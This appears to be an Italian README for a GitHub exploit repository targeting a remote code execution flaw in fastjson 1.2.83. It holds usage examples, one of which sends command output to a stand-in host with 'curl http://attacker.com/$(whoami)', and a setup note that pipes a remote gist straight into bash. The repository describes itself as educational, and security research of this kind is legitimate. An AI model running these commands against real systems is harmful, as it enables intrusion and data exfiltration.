
CVE-2026-16723 — Updated!
CVE-2026-16723
CVE-2026-16723
Dona
Supporta la manutenzione di questo progetto con PayPal o scansionando il codice QR qui sotto.
⚡ Utilizzo Semplice
Utilizza questo progetto solo in ambienti sicuri e autorizzati, come:
- Macchine virtuali locali
- Container Docker
- Configurazioni di laboratorio isolate
- Ambienti di penetration testing autorizzati
Configurazione di esempio:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Utilizzo di esempio:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
Nota:
- se cloni da un altro progetto, devi eseguire
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -yper rimuovere la directory .git annidata - es: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
Crediti o Riferimenti
- https://fearsoff.org/research/fastjson-1-2-83-rce
- https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
- https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch
📚 Repository Educativo di Ricerca sulla Sicurezza
Un repository per apprendere, testare e ricercare concetti di cybersecurity in ambienti controllati.
⚠️ Disclaimer di Sicurezza e Legale
Scopo
Questo repository è solo per ricerca sulla sicurezza educativa e autorizzata.
È progettato per aiutare gli utenti a conoscere:
- Le vulnerabilità di sicurezza
- I concetti di sandbox e isolamento
- Le pratiche di codifica sicura e difensive
Uso Esclusivamente Autorizzato
Utilizza questo repository solo in ambienti in cui hai l'autorizzazione, come:
- Laboratori personali o macchine virtuali
- Ambienti Docker o isolati
- Penetration testing autorizzato
- Formazione sulla cybersecurity o ricerca accademica
L'uso non autorizzato o illegale è severamente vietato.
Nessuna Responsabilità
L'autore e i collaboratori non sono responsabili per eventuali danni, usi impropri, problemi legali o perdite causati da questo progetto.
Utilizzando questo repository, accetti che:
- Sei responsabile delle tue azioni
- Lo utilizzerai in modo legale ed etico
- Il progetto è fornito senza garanzia
Uso Etico
Questo progetto è pensato per:
- Ricerca sulla sicurezza difensiva
- Educazione alla cybersecurity
- Consapevolezza delle vulnerabilità
- Ricerca su sistemi e software sicuri
Si prega di seguire le pratiche di divulgazione responsabile e di rispettare tutte le leggi applicabili.
Contatti
Per divulgazione responsabile o collaborazione, contatta il manutentore del repository tramite GitHub.
